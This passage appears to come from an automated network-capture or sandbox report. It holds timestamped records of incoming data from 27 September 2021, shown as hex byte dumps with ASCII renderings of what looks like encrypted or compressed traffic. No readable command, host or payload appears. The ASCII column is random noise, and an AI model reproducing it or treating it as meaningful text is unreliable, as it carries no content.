                                          2021-09-27 15:30:10 UTC131INData Raw: 33 5c a8 9e 11 88 c0 3c cc 1a d6 37 64 4f cb c5 e8 e3 8f 2b 13 c2 fa 36 4d bc 77 54 64 09 bd 0a fd 00 99 43 86 08 60 a4 59 89 7e 1b fb b8 e7 9d 20 8b f7 b1 80 87 e8 fc 4d 8e 91 e1 cd 3e 78 81 ff 4b e9 49 6b a0 cb 02 0b 32 46 69 be b5 46 bf c7 a6 ee ba 60 e1 5c e9 82 5d a8 16 23 5c 90 67 a2 0a 39 64 93 cf 69 84 db 97 db f4 e8 1e ce 0a 18 e7 ac f6 a6 b3 75 4a 25 90 0a 55 b5 d7 28 e6 f6 00 d4 ed fc ca b1 ef 81 e3 c0 e0 4e 66 a3 2f 8c c3 1c 07 93 a2 6a cb 1e e5 fb f3 3d f9 da d2 f1 3b d5 88 d7 80 1f 9c 11 b3 9e 14 43 32 61 aa e7 c7 07 aa f7 a5 7a e2 b3 2c 09 20 f9 08 99 f6 5e 55 a3 16 ad 0d ec 22 88 e7 f9 0c 73 87 5d 46 7e 6c c2 6a 57 21 e4 d3 5c b3 bc 47 f1 61 51 ee d6 1d 2c 88 37 df 0e 90 88 0e 62 dd 18 18 60 f2 c5 c1 19 dc 1c 56 db 72 49 ed e4 10 35 b8 ec
                                          Data Ascii: 3\<7dO+6MwTdC`Y~ M>xKIk2FiF`\]#\g9diuJ%U(Nf/j=;C2az, ^U"s]F~ljW!\GaQ,7b`VrI5
                                          2021-09-27 15:30:10 UTC132INData Raw: b6 82 c5 95 1c b9 51 26 c8 05 04 b5 6c d6 1a c7 b4 e3 4d 41 36 40 48 cd 2b 23 51 2b 01 aa 4e a3 b7 1d c6 3b 37 01 13 a8 ab 79 32 3d 19 76 c3 a7 bf a7 c8 c0 57 22 6a 4d c2 e0 18 e8 cc fc fa fd 69 c4 8c e5 0c 49 6a b0 87 46 7c f6 3d 7d c7 16 1c a1 f5 05 6c 98 30 1a 63 7f 1b da 11 69 50 cb 54 3f d2 79 8f 40 56 f0 c7 dc de 27 1e 28 66 5f ee 7b 1a ce 93 63 cf 51 39 28 8a 7a 6f 54 02 3b b8 4a bd dc 37 5c b5 d5 ba cf 89 3e a4 78 3b 31 0d 72 c5 cd ec c7 69 43 5e fd c0 69 ae 98 ed aa a9 a4 1c d5 a2 97 30 e7 82 f8 74 f5 42 bf f5 70 5e c8 bc c1 56 7a 56 ec 21 1e 3d a5 8c 62 44 76 e7 45 d6 a3 d2 a9 d2 f8 05 4f 27 59 95 c6 a3 5a d6 c8 e2 7f 3f 5c ab 52 4f c5 13 5b af a4 95 2e c4 26 a6 f9 5f b6 3a b4 dc a4 ef ff 28 9f fd 38 a9 bd d4 99 38 70 08 18 a1 ed 9f c8 f5 cc c7
                                          Data Ascii: Q&lMA6@H+#Q+N;7y2=vW"jMiIjF|=}l0ciPT?y@V'(f_{cQ9(zoT;J7\>x;1riC^i0tBp^VzV!=bDvEO'YZ?\RO[.&_:(88p
                                          2021-09-27 15:30:10 UTC134INData Raw: 11 a6 31 81 84 1f df 6f 44 02 2f 24 a9 68 12 5a 08 de 3a 6f f7 17 06 54 51 7f c0 a5 61 42 4c ac be dc a0 ed 3e 56 39 d1 a3 3c f6 19 c5 ec c3 8d 45 18 c2 60 0c 47 86 7c 76 46 0e 97 8c a3 e1 88 43 82 37 be 8c 74 8b e4 38 fc 28 bf 24 f5 8b f3 91 83 10 e3 fc d7 b4 99 d8 c6 1c 5b 86 d5 cd b7 52 7a a0 cf 3f f6 1f 44 69 22 ba ed d3 78 87 3b be 40 c5 7d 52 89 c7 8d 24 15 52 9d 41 a3 0c 13 c2 64 46 68 84 c0 be 25 d9 ea 1e 52 05 b3 8b 13 d7 70 b7 55 6f 04 4f 01 cf 90 e5 1b e8 fb 27 d5 eb d6 6c 5d 66 80 e3 db cb b1 4b a1 2f 10 cc b7 6b 2c 83 bd cf 3e c3 da f3 31 63 ff e0 c2 35 d8 ac d6 86 35 3a f2 3a 9f 14 58 1f 91 87 e5 c7 9b a5 5c c9 c5 c3 6b 28 29 07 d8 29 95 6c 7b 67 90 18 a0 28 ed 24 a2 41 2d 85 72 87 46 6f 8f 41 c0 6a cb 2e 4f bf e3 92 65 43 d1 49 70 ac da 87
                                          Data Ascii: 1oD/$hZ:oTQaBL>V9<E`G|vFC7t8($[Rz?Di"x;@}R$RAdFh%RpUoO'l]fK/k,>1c55::X\k())l{g($A-rFoAj.OeCIp
                                          2021-09-27 15:30:10 UTC135INData Raw: 74 2d b9 b6 52 71 ce bd 89 16 1b 99 05 7d 0d b2 96 27 07 0d 06 65 7a 25 9c 4c 24 c3 13 9c 9a 9e 21 0f 9f 75 4e 33 05 04 95 2e e1 37 d6 8d cc 9f 6c 34 40 6e c7 a3 5d c8 37 29 83 6c ea b0 37 40 df 8b 2d 01 8a ab cb 33 3d 19 cc 01 98 ad 81 f7 1f 7f 0f 68 6d e3 c4 9e 96 4a f0 d2 d4 4b 8e 8b cf 8e ad d6 9c 95 64 7c 40 3c 7d c7 ac 32 9f e4 23 53 77 18 37 61 5f 29 fe 97 17 d7 e2 79 39 f2 34 a4 c6 28 f3 e3 f1 c8 21 c3 63 67 5f 74 7e 29 cf b5 43 2d 75 11 05 a8 46 67 7e 84 5a 3a 63 90 da 17 16 9e 57 c4 cc ad 13 b2 7e e5 7d 0c 72 5f c8 83 c5 4f 63 bf d8 e8 44 8c cf e5 80 2f cd ad f9 a0 93 16 80 01 86 ed 6e 67 96 c7 a9 7e 85 bd 5b 73 77 20 d9 01 e1 22 81 a4 6f 1e 78 e1 6f 4a f5 66 aa d2 fa 0f 83 58 c0 94 5c 82 57 c4 ef c2 31 a4 79 86 63 e2 f6 13 5a b0 86 9d 5f c8 26
                                          Data Ascii: t-Rq}'ez%L$!uN3.7l4@n]7)l7@-3=hmJKd|@<}2#Sw7a_)y94(!cg_t~)C-uFg~Z:cW~}r_OcD/ng~[sw "oxoJfX\W1ycZ_&
                                          2021-09-27 15:30:10 UTC136INData Raw: bb ff 27 64 f5 6c cf 1b d6 ed a1 9a d9 42 b2 2e 18 40 81 52 8d 9e 5c 82 76 03 d5 3d 82 98 f0 85 82 84 1d d5 82 3b 9b 2e be 88 65 21 7d 28 b1 a1 4a da 26 88 61 70 7e df 85 69 1f 5e ac b8 e8 0e be a5 57 3f ff 05 32 6e 18 c5 72 c6 82 56 3e e2 8a 28 6a 94 7a 9e 71 0f 97 93 8e b1 b5 41 82 2e 9e 22 27 10 e5 3e d2 8a b0 bc f4 8b 6d 94 8d 03 c5 dc 3c 90 b4 c9 c0 e9 6d 87 d5 d2 9b f8 47 a2 cf 24 f4 b4 38 f0 25 90 6f 8d 93 87 3b ba fa c4 51 40 af 7d da 08 07 74 9d 84 b7 0c 13 fd e7 7e 45 86 df b1 27 72 96 87 55 2f 31 d5 f9 d7 70 b3 ef 6f 28 5d 27 75 c6 c9 09 ce fb e9 c1 eb d6 53 c4 5e ad e1 c4 c6 b3 e0 dd b6 17 e6 35 35 c1 83 bd cb 84 c0 f6 e1 17 d9 ae cc d0 13 d8 7c c2 86 35 05 59 02 b2 16 47 14 93 28 99 5e 9c 8f de 97 29 c3 6b 2c 93 05 f4 38 b3 d6 2b 4b 82 3e a0
                                          Data Ascii: 'dlB.@R\v=;.e!}(J&ap~i^W?2nrV>(jzqA."'>m<mG$8%o;Q@}t~E'rU/1po(]'uS^55|5YG(^)k,8+K>
                                          2021-09-27 15:30:10 UTC137INData Raw: 8f 75 b7 b4 d1 a2 ef f2 cf 82 89 91 dd d9 4c 82 63 0c 38 a6 03 0f 68 b2 25 13 d4 65 12 bd 1a fe b7 4f 59 c3 0b 9b 10 31 04 5f cc 21 b0 92 01 bb 8a 78 fc e1 00 b5 7d 4a e2 85 9d 00 bb 2c eb ae 55 06 28 2d 29 b7 f6 f5 1d 50 ec 5a b6 41 32 60 ff ec 25 23 cb 13 04 95 6a 83 26 36 40 45 8e fa 04 ac 8b 9d 22 15 34 ee e6 8c 87 07 96 a2 56 22 6e 4d 7d ef 18 e8 49 d4 ff c2 4d e4 12 ce 8e 37 d3 bb 9f 42 5c 15 30 55 ea 8e 39 8a ce a5 32 fd 31 1a 67 7f b6 d5 11 69 d4 c6 54 2f f4 5f 3c c7 28 69 e6 cb c2 07 e3 37 69 77 59 5c 37 da 9f c1 4c c8 38 28 ae 66 fb 55 02 24 39 47 bd cf 11 7a 05 56 c4 56 a8 18 b8 58 c5 29 25 5f 5d e8 c7 fc c9 1d 39 fc c0 6d ae 54 e2 aa a9 29 11 d5 b2 b1 16 56 01 86 ed d4 6a a3 d5 8f 41 d4 94 76 71 57 41 e0 87 9f a4 a4 8c 46 3c e4 e6 45 cc 11 da
                                          Data Ascii: uLc8h%eOY1_!x}J,U(-)PZA2`%#j&6@E"4V"nM}IM7B\0U921giT/_<(i7iwY\7L8(fU$9GzVVX)%_]9mT)VjAvqWAF<E
                                          2021-09-27 15:30:10 UTC139INData Raw: 32 9f fb 1d f8 dd cf a3 df 6c e6 00 96 c5 fe 5b 45 7b 19 a6 b7 36 a6 90 a9 2e f9 81 28 a6 df 49 7a ed 44 78 3c fb f9 ad 38 c9 da b3 2e 3c fc 29 53 8d 81 ca 8f 76 10 f3 1b 15 1f 8e 1c a3 12 00 f5 ed 27 b3 03 26 ad 4e 19 d9 76 47 a1 4a de 26 9e 75 70 7e 5a 80 6c 23 7a 8c 00 c3 88 c0 1c cb 26 fb 25 5e 47 35 c7 e8 e5 85 c2 66 5b fb 29 6e b4 e5 57 64 0f 0d a9 ae 8b be 63 3d 29 b4 a4 79 2a fd 3e d6 b5 c8 95 d9 89 f7 b7 8a 97 9d 65 4c 91 b0 e9 20 3d 78 87 4f e8 ba c2 4c 80 0f 23 de 32 66 c5 3d 90 6b b2 cd ae 16 b8 60 e7 56 d0 f7 c4 a9 09 03 54 7c 64 a2 0c 89 c7 c0 47 4e a4 1e b6 0d f4 c8 c6 4d 2f 35 eb a2 fb 72 b3 73 60 87 31 98 54 b5 cc 29 0c da 02 d4 71 f3 61 de 50 a0 21 c5 c0 99 46 43 36 16 e6 2f 3d 98 80 bd cd 34 63 a5 6a 30 f9 de ed 13 12 f8 8a 4d a3 18 08
                                          Data Ascii: 2l[E{6.(IzDx<8.<)Sv'&NvGJ&up~Zl#z&%^G5f[)nWdc=)y*>eL =xOL#2f=k`VT|dGNM/5rs`1T)qaP!FC6/=4cj0M
                                          2021-09-27 15:30:10 UTC140INData Raw: 59 55 ee b5 6a 90 7e 15 8b 47 72 29 1e 0f 33 95 c3 dd bb d1 64 c4 30 78 65 86 8d a0 10 b4 2c 81 b6 d1 bb d0 58 9c 19 88 97 f3 7f a7 1a 62 0c a6 a3 ca 1f 4e 92 2a 37 f9 77 14 72 e9 ff b7 52 51 68 12 9b 16 04 8f 09 78 22 b0 90 0b ab f5 e1 fd 7b 21 b8 89 6d c2 13 06 25 96 1e 3b 99 b0 07 32 05 24 3a ed f3 37 c9 98 eb 9a 43 36 46 42 6b 5b ba 50 36 2d a7 aa a2 b1 37 da 60 83 12 35 8c 6d 83 32 3d 39 75 fd 8a ad 9e e3 13 7a 20 6a 6b cf 6c 66 71 d2 f1 d6 f0 8c c5 8a cf 14 12 de a0 a1 62 bb 0b 3d 7d e7 28 22 8c e4 3f 64 49 32 1a 65 75 ad aa 88 68 4e e7 59 d5 d3 7f a5 5c 0d 44 d7 fa fa ef e2 28 66 7f de 45 37 dc a8 6b 1f 53 39 2e 80 c0 1f cd 03 24 a7 42 79 df 37 5a 05 72 e9 44 ae 1e 49 59 c5 31 2d c3 44 e8 c1 c9 45 4b 8d ff c0 6f a4 49 9d 33 a8 b3 30 d8 4a 96 36 cd
                                          Data Ascii: YUj~Gr)3d0xe,XbN*7wrRQhx"{!m%;2$:7C6FBk[P6-7`5m2=9uz jklfqb=}("?dI2euhNY\D(fE7kS9.$By7ZrDIY1-DEKoI30J6
                                          2021-09-27 15:30:10 UTC141INData Raw: 6b e0 83 95 a2 a8 1d 36 af 5e c8 18 28 0b af c8 2c 72 06 ce 4b 4b 15 24 65 30 40 23 5c 1a 92 dd 00 fe f7 56 d1 6e 40 e4 04 b0 53 79 25 dc e0 3c 8f 85 1b 84 2c a8 b4 dc 8c 44 99 ff 42 67 f5 6c 75 0e e6 ff 87 a5 ba 6b 9f 2c 38 da be d4 f3 18 51 aa 5f 21 d9 39 a8 1e 14 39 ae 96 3f d5 e1 38 9b 2e 04 90 55 33 5b 17 d0 88 67 d8 06 26 5e f6 00 59 a4 41 36 7c a1 bc c2 88 5a 19 7b 2d dd 05 4f 6d 18 c5 c8 a8 b2 44 18 dd e8 01 47 96 5a 50 4e 89 e9 15 82 99 9c 63 8c 2a b4 a4 c3 ac c9 2c f0 8a cf bf f4 8b d7 ec bd 11 e3 e3 5e b9 99 cb e0 3a 52 01 ab 54 96 d0 6e 80 c0 20 de 32 dc 4c 09 82 4d 8d ee 84 3b ba 40 91 61 52 89 42 be 21 2a 76 bd 63 88 8a 6d 7b ec 56 6c a4 cf b5 0d f4 72 3b 79 3d 13 d5 9a d4 70 b3 55 cc 18 4f 01 4a a2 e0 24 cc db 04 fe 6d a8 d5 ce 76 84 c3 d5
                                          Data Ascii: k6^(,rKK$e0@#\Vn@Sy%<,DBgluk,8Q_!99?8.U3[g&^YA6|Z{-OmDGZPNc*,^:RTn 2LM;@aRB!*vcm{Vlr;y=pUOJ$mv
                                          2021-09-27 15:30:10 UTC143INData Raw: 1e e0 c2 e0 16 8c 6f 98 43 f5 e6 e6 1d d5 dc 85 4e 9c e2 13 0a 8e 1f e1 ee 45 70 69 45 59 d2 e3 b5 7a b6 58 0e 0f 39 eb 08 d6 2b 13 76 dd d6 93 66 43 e9 24 74 c7 1b 15 a1 10 90 7d a8 b4 d1 a4 5f 55 9c 0a ae b1 eb fb d9 83 43 df 82 83 2e 03 66 bf b2 12 d2 4f b4 2c 94 ff b7 56 51 dd 0b 9b 16 81 a3 0c 47 06 90 a5 23 2d 8b 58 26 5b 25 98 73 5d ea 3e 9e 00 bd 26 9b c7 cc 07 32 01 24 81 f4 f3 37 4c b7 ee a5 67 16 74 6a ed 25 03 5a 17 29 87 53 a9 99 1a 42 45 a8 2a 95 d2 12 83 32 39 39 d9 e4 8a ad 1b cd 16 45 04 4a 58 e7 ee 18 c8 c6 d0 d2 d0 74 eb a2 e2 8c 37 f5 9b 01 3c c5 0b 3d 79 e7 ba 3b 8c e4 b9 69 49 22 3c 43 69 2d d4 11 49 0a c2 79 3d cd 74 8d eb 2a 69 c0 f6 5c 79 7a 29 66 5b 54 69 35 dc b5 d9 17 7c 2b 0e 8a 71 63 54 02 04 ec 43 90 de 28 53 b7 7a c6 56 8e
                                          Data Ascii: oCNEpiEYzX9+vfC$t}_UC.fO,VQG#-X&[%s]>&2$7Lgtj%Z)SBE*299EJXt7<=y;iI"<Ci-Iy=t*i\yz)f[Ti5|+qcTC(SzV
                                          2021-09-27 15:30:10 UTC144INData Raw: d3 8b e7 f5 32 18 6a 85 0e 14 16 4d a3 14 ed 4b fe 78 95 e8 03 b6 06 6b a3 5d 65 3d 26 6a ff 8c 9d d7 a8 1d 30 1f fd 9b 93 0f 2b f3 ea 26 70 26 b7 f2 6e 38 29 5b 38 67 23 5c 1c 98 7f 63 67 f6 49 d9 66 34 e4 04 b6 e3 da 76 57 c7 1c d2 a7 10 86 0c 39 0d f9 a1 49 b0 f7 64 67 f5 6a 7f bc 85 66 86 ba b3 63 e8 2c 38 dc 0e 77 a0 90 76 8a 01 03 d5 3b 88 be ad 1c 83 9a 31 d8 ef 3a 9d 04 a2 d3 d1 32 5b 0c fe fb 48 da 06 ba 51 5d 6c e6 85 1a 30 5c ac 9e 6a ab c0 3c 49 27 d3 08 40 6f 1e ef 6a 9d 36 45 18 c6 da 75 68 94 5a cc 41 22 86 aa a3 c5 9a 43 82 08 74 87 59 89 fe 16 fb a8 c1 bb de 09 89 28 a1 11 e7 dc 10 93 b4 c9 7a 19 55 96 f3 ed ca d2 6a a0 ef e6 fd 32 46 77 0c bd 69 ad e7 ac bd c4 f9 e0 7c 56 a9 03 aa 09 07 ee 98 48 b0 2a 33 bc ef 56 68 a4 13 94 0d f4 f7 0f
                                          Data Ascii: 2jMKxk]e=&j0+&p&n8)[8g#\cgIf4vW9Idgjfc,8wv;1:2[HQ]l0\j<I'@oj6EuhZA"CtY(zUj2Fwi|VH*3Vh
                                          2021-09-27 15:30:10 UTC145INData Raw: 38 3f ff e2 b7 71 8f 22 03 ce b2 cb bf e7 1f 64 3c 5e 77 c5 dc 5f f4 4c 0c c4 31 fc e2 10 ed f0 e2 10 a6 c9 5d fa f4 e6 fd 30 82 f3 87 4e 00 ed b8 66 31 3e 9e e8 65 41 4b fa 7c 48 c6 87 66 b8 55 3d 0d 3f c1 ae 60 92 12 76 c6 fd 3b 49 41 e9 b8 7b 68 77 aa 80 90 96 5d 9a 96 1c 81 c5 70 ae 07 a0 bc db f9 df a9 e5 72 3b 82 2e 1a 6e 13 b2 12 d4 ff 17 7f 1f d8 97 d3 73 ee 09 bb ff 3e 86 21 4a 3d 98 bb 23 2d 8d 52 7a 05 bc 99 6c 68 e2 91 9e 00 bb 96 38 94 47 20 12 87 06 b5 f6 d3 31 f0 92 c3 a8 4c 1e 6d 6a ed 23 09 d7 48 b0 86 4c a7 91 b4 42 45 ae 9a 36 81 99 a4 12 be 1b ec e6 aa be a7 e8 3b 48 36 42 40 e7 ee 1e c2 55 8f 4b d1 6b c0 aa 4b 8c 37 f3 2b a2 6f 4e 2c 1d f9 c5 8c 39 ac c3 05 4c 64 2f 0e 4b 72 2d d4 17 43 c8 9d e0 3c d2 7b 85 43 2a 69 c6 46 ff 2a f1 0e
                                          Data Ascii: 8?q"d<^w_L1]0Nf1>eAK|HfU=?`v;IA{hw]pr;.ns>!J=#-Rzlh8G 1Lmj#HLBE6;H6B@UKkK7+oN,9Ld/Kr-C<{C*iF*
                                          2021-09-27 15:30:10 UTC146INData Raw: e3 c2 ea 1b 18 3a 2e 16 e2 11 81 b7 82 bd 51 3b c8 ca d5 11 6d d8 cd d0 33 45 ac d7 86 2d 32 42 28 9f 12 6d 90 c7 33 e6 c7 99 af 4f b5 5c c2 f1 09 24 31 ff 09 00 f4 5e 4a a2 81 a6 0f ec 33 8a 4c 85 95 74 ad db 18 3e 6d c2 6e ed 92 cb c1 7a 09 40 6a e0 47 51 3a d8 1d 2c b7 d6 d1 23 92 90 20 65 59 66 87 4b 70 bf 78 c2 dc 18 76 d6 55 64 ff 58 15 c2 a9 ca e8 61 7d 07 02 81 b6 8c 91 16 da bb f8 31 3a 4d f7 d5 0a 1c d0 f0 cf 63 dd 10 b9 81 e1 93 5c 9a 24 5d 54 b0 cb 25 e2 f1 50 1a 7e 11 ef f1 5d d4 fa 03 46 4f 7a ec 38 c4 d2 7b 14 8c 4f b9 46 d8 f7 df 30 64 f3 87 4e ba 0d b3 74 17 09 c9 c7 67 41 6d 6f db 36 5f 99 68 94 58 a5 0f 39 eb b2 3b 26 02 50 e2 47 b9 4b 41 c9 e4 78 45 65 94 88 3d 96 5d 9c 9c 53 da 5c 71 b1 1f a8 0a db f9 d9 19 46 21 b3 a5 0e 85 4c 92 b0
                                          Data Ascii: :.Q;m3E-2B(m3O\$1^J3Lt>mnz@jGQ:,# eYfKpxvUdXa}1:Mc\$]T%P~]FOz8{OF0dNtgAmo6_hX9;&PGKAxEe=]S\qF!L
                                          2021-09-27 15:30:10 UTC147INData Raw: 28 11 3f a0 5c e5 8a 0f 72 5f 72 e4 fb 5d 45 80 46 c2 69 8e ef ec 82 a9 b3 2b f7 88 ba 34 cd 06 ac 6b 8a db ba d5 8b 7e 74 be 5b 73 cd 62 e7 13 c7 1d 19 8e 42 1c 58 f9 6d cc 8b e0 bd fa d3 2d cd 5f ea 12 b8 3e 7b d6 cd c2 c2 a7 79 86 d9 4c c8 01 7c 8f 19 b7 72 ca 06 92 c9 77 9b 27 ba f2 a3 6b 81 b7 b4 7f 42 10 bd d5 9d 18 54 2f 35 b3 51 9a e4 e5 ea e7 e8 14 08 85 34 c4 96 50 a1 2d 08 29 a7 6d 9e 02 a0 93 8d 56 3a 8b 6e 7a c0 47 4a 6c 63 b1 f3 26 f5 91 d8 14 84 43 64 3d 9c 21 51 ab ad 01 ae 58 52 e9 7d e2 8d 4d d1 8f c7 af 15 35 78 39 0b 6e 05 6b 83 f4 86 68 fe 58 df d0 2b 9b 1a 43 88 75 e3 45 95 e9 81 11 bc 8f ae 3d f1 87 d8 b6 1b 0c 26 ba ce 06 b1 04 ce d1 4e 65 1e 43 10 54 09 71 18 b2 ff 37 78 89 d0 dc 46 69 c6 c6 b4 79 ff c1 60 cc 2e ad 85 d2 84 2c a8
                                          Data Ascii: (?\r_r]EFi+4k~t[sbBXm-_>{yL|rw'kBT/5Q4P-)mV:nzGJlc&Cd=!QXR}M5x9nkhX+CuE=&NeCTq7xFiy`.,
                                          2021-09-27 15:30:10 UTC148INData Raw: c3 1e 54 30 11 dd a7 d4 70 b5 5f c8 7b d6 00 55 b1 e8 eb cc db 02 4e ce fb 5d e9 56 62 e1 c4 c0 b9 fb 88 2f 16 fe 19 38 b7 82 bb e1 9c 9b 42 f2 31 fd fa 2e d2 13 f8 10 f2 ab 24 3c 4f c9 9d 14 47 32 26 81 e7 c7 83 a7 f7 b5 5c c4 41 aa 77 b9 d8 29 91 d6 ba 48 82 3e 1a 2a c1 36 84 41 63 97 72 87 79 c1 8c 6c c2 75 c6 2c e4 c3 7a 95 4f c5 8f f8 70 ac de 3d c9 95 16 f7 b9 b7 a5 19 6e 7b 83 83 61 f2 e1 53 e8 dc 1c 48 69 7a 66 ff c4 1a 69 c6 75 c9 f6 7b 27 e4 a3 74 aa 0b 33 e0 81 f3 13 dc 49 dd 57 54 3f fa f0 cb 5c 6f 3a 94 83 7b b0 5b 0d 7c e4 cd b2 cf 05 25 30 76 1a e4 2c ea ce 79 f4 1b 2b c4 31 c3 09 13 c0 f2 fd 00 a4 62 21 63 f3 cc 7f 6e 64 f0 87 4a ba 20 97 74 17 84 c4 c7 77 67 4b ad 5b 48 c6 b8 92 bb 78 3f 12 33 c3 05 1c 0b 15 5c 40 a3 22 4a 41 ed 02 b7 47
                                          Data Ascii: T0p_{UN]Vb/8B1.$<OG2&\Aw)H>*6Acrylu,zOp=n{aSHizfiu{'t3IWT?\o:{[|%0v,y+1b!cndJ twgK[Hx?3\@"JAG
                                          2021-09-27 15:30:10 UTC150INData Raw: e0 28 66 7f 1a 73 37 dc a9 6b 1f 53 39 2e 80 c0 1f cd 03 24 a7 42 99 dd 37 5a 05 72 e9 44 ae 1e a9 5b c5 31 2d 06 72 e8 c1 c9 7d 4b 8d ff c0 6f a4 49 9d 33 a8 b3 30 d8 aa 94 36 cd 9a a3 c0 e6 64 9b df 8c 5e c8 9c fd 5e 57 47 d5 1a c9 10 a7 8c 44 36 fe 99 dc cd 8b fb 8b d9 fd 2f cd c3 e5 b9 d4 81 5a dd ca e2 7f 85 b8 ab 43 69 fa 3a 72 82 a6 b5 74 e0 a0 d8 78 76 9b 3c 94 d6 8d 69 81 2b bb d0 2e af 9c d9 9a 38 ea 0d df 9e cb bf d6 c5 e4 ea 54 16 0e af 92 f8 27 51 a1 32 00 09 a6 6d 98 b2 03 c0 06 71 1a 82 4d c5 c2 67 51 d8 46 9c fe 22 fd 03 d8 14 82 49 a5 6b 05 20 4e a1 a5 22 af 58 54 59 da b1 06 6a f1 85 e4 6f 17 15 45 8d 2e 43 0b 56 8b 19 86 68 f8 52 08 86 b2 9a 04 6f 85 78 e0 43 bf f1 da a5 ac a9 8a 12 33 85 d8 96 d9 07 0b ab ff 0e 5d 04 ce d7 44 ba 48 da
                                          Data Ascii: (fs7kS9.$B7ZrD[1-r}KoI306d^^WGD6/ZCi:rtxv<i+.8T'Q2mqMgQF"Ik N"XTYjoE.CVhRoxC3]DH
                                          2021-09-27 15:30:10 UTC151INData Raw: 7e 3e 4f e6 67 ff 0b b3 8a 49 ce 56 d9 dc a6 33 f0 67 d4 dd 1e 0f b5 aa 68 30 51 f8 1b 07 f7 a3 de ce 02 7e 1c 81 4a 9d a0 f6 ae f4 98 6e 36 fe 29 5e 9a 53 64 4c ff 74 f2 0c 64 4b 56 0c a1 09 9e b0 5e bc 9e 39 18 2f 42 ba 73 59 71 ae 61 40 64 4d b1 5e 27 76 3e 8a 9b c2 88 3b f0 e7 a1 0d 07 52 6f 31 73 2b 4d e6 6b c9 8a aa 94 7d db 64 45 00 11 da 76 dd 53 b7 66 f2 26 82 e7 00 ef 2f 0f f8 39 9d 27 9b 6c 87 95 3c c5 16 1a a8 25 20 de b5 62 66 e7 6c 9d 5c d0 fa 6e 3a 3b 40 c4 17 98 ac 89 be b7 4d 39 38 38 17 cc 81 4e 9f db 8f bc ee 71 33 24 bf 7e b4 9d 54 fd 87 d5 37 31 4a e1 4c 61 99 cd f6 94 7d 4a 0f bd 82 6f b2 5f 9e 19 53 e2 82 de 32 ec 10 5f 3d 45 0b f4 f5 6f e3 dc 01 c3 3c c9 d6 15 bc eb d1 31 bd 57 07 5d c5 da 26 d6 75 1a 5b 8e 41 16 52 a5 fe cd 2e 29
                                          Data Ascii: ~>OgIV3gh0Q~Jn6)^SdLtdKV^9/BsYqa@dM^'v>;Ro1s+Mk}dEvSf&/9'l<% bfl\n:;@M988Nq3$~T71JLa}Jo_S2_=Eo<1W]&u[AR.)
                                          2021-09-27 15:30:10 UTC152INData Raw: 6c df 7d 05 cc be 8c da f5 98 b2 de 28 fd b6 b5 13 8a c7 2e c0 50 3e d1 95 41 56 55 8b 22 ad fa d5 ac e7 b8 53 36 8a 9f d0 a6 bd 26 d6 f9 c2 9b ab 0d e5 0d 5f 86 83 1f cf 7e b8 35 85 02 fc 6c 85 ea 9c f9 09 5b 55 ea d2 1b 7a 4c df 22 4c 4b 18 09 12 87 59 4b 65 b2 77 59 d9 90 8f 20 b1 c8 90 4b c5 ac 54 65 5e 52 bf 74 89 51 b7 97 4f 62 24 a5 06 90 d3 aa fd 92 a2 4a a8 7e b1 b7 be dc 00 f9 ac 8d 0c ce 53 f7 34 1f 9b 65 20 de df cc 0b fe 13 d7 9d 11 b7 10 87 dc 91 3a d6 f9 96 e5 6a cd ae c0 97 2a b6 0a 3f b9 d9 a2 d4 aa e7 de 53 10 41 d5 59 96 a6 4a a0 5c 08 23 80 4c a5 59 49 8c 67 27 19 f8 6b e0 a5 23 2d cc 21 99 9e 60 a7 1e b7 64 e9 57 4a 1c f5 a4 87 33 0c be 65 9b 97 15 7c 5f da 86 19 5d 7f f7 8f bd f1 2d a1 cf 99 dd 2e ac 1c e2 66 aa 50 1c d4 2d b1 ca 4c
                                          Data Ascii: l}(.P>AVU"S6&_~5l[UzL"LKYKewY KTe^RtQOb$J~S4e :j*?SAYJ\#LYIg'k#-!`dWJ3e|_]-.fP-L
                                          2021-09-27 15:30:10 UTC153INData Raw: 5c 20 0d c8 3b 6f 9e 52 3f 44 6d a8 a7 5d 54 46 1c 5e b1 3b 59 b0 4e bc 86 b9 f4 50 aa 39 77 44 f8 52 95 52 f3 ad 74 ec 59 e4 a2 db 12 d7 5b ab b9 56 42 fc de 36 3c 0d bf 48 4f ee e6 96 8e 4e 2d c1 79 b8 6c 54 48 02 1a 41 b4 d6 53 ab a8 74 bd ac d1 5b 90 27 d1 ab c7 a5 c3 38 f6 76 56 a1 24 4d fa da d7 b7 74 8d b3 9f 46 90 ba a7 a7 78 91 f9 af e7 4e 68 1f 54 f0 62 33 61 c0 ce 9f be ed 9e ca a4 05 d1 79 3d 27 2d ca 30 a0 ff 7a 41 8a 34 8e 03 f0 12 bc 6e 92 94 69 96 1d 21 e2 5b d8 50 ff 1f f9 fc 41 ba 45 41 c0 48 46 8f c1 0e 3a ae 3f c6 0a b8 f9 07 7d 6c 59 bd 62 c1 f1 e7 f3 17 d3 99 dc c9 fa 5e 65 9f 46 2d 7d 5c 71 d6 a8 b5 10 f9 23 1f 89 30 4a 03 e3 e2 9b 1f bf a9 54 38 1a 33 be a2 f2 5b 23 8a 50 9f 6e c0 95 2b 42 3c db 34 df 8c ea 81 e1 38 2a a1 31 47 93
                                          Data Ascii: \ ;oR?Dm]TF^;YNP9wDRRtY[VB6<HON-ylTHASt['8vV$MtFxNhTb3ay='-0zA4ni![PAEAHF:?}lYb^eF-}\q#0JT83[#Pn+B<48*1G
                                          2021-09-27 15:30:10 UTC155INData Raw: 70 ab 84 82 fa e8 61 6d 82 50 7c 19 58 6c c1 6c 22 63 39 9e 53 1b 71 b3 ad 95 d4 96 5a 62 cb 13 0f c5 ab 99 d5 89 82 cd d7 c6 79 04 51 e0 63 21 c9 64 b4 d1 3b 09 d8 c1 c6 7b 8f 79 31 05 24 15 79 ce c5 01 66 03 6b 72 eb 25 0b 30 2b 7a c5 0d f6 b9 46 7a ce 23 ac 26 e8 47 cf 2f ae 1b 50 28 76 b9 e6 f2 6c 58 8e ab ed 42 c8 93 bb 85 f6 f2 1b a9 fb c7 7a ef 23 d6 c9 b9 09 f7 e8 b5 63 86 f9 7e 65 45 16 ff 04 f0 2c 8a a9 7e 3c 57 c4 7a b6 fe fe a8 a6 80 5a cb 31 dc ff df c8 09 bd d0 8e 18 db 1d 92 2d 0e 9c 70 c1 33 3f 2a 9e 53 cc 38 01 e6 02 ce 7b 13 4e a3 4c 79 06 07 f0 53 64 0d 45 ff 33 fd ef 77 3a 3c 7a 3b 73 76 eb a1 a9 31 a7 47 0b fc 13 f7 e7 b8 12 ce 39 f5 8d 5f ba f9 98 58 ea 10 60 93 9d 51 ee 34 5e 80 55 a5 59 8e 15 a0 87 9b 17 a7 c3 2e 5f 94 31 d3 